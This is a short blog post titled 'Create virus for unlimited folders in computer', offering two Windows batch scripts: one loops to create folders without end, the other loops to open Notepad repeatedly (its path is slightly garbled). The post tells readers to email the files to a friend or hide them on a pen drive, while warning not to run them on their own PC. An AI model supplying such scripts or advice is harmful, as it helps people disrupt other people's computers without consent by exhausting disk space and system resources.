Showing posts with label notepad. Show all posts
Showing posts with label notepad. Show all posts

Thursday, 5 September 2013

Create virus for unlimited folders in computer




@echo off
:top
md %random%
goto top
Type above code in notepad and save it with name something.bat. send it to friend via E-mail or Hide it and upload it in pendrive.
NOTE:- Don’t Open in your pc.

Open Notepad continually in your friend’s computer

Type :
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top
Save it as Anything.BAT and send it.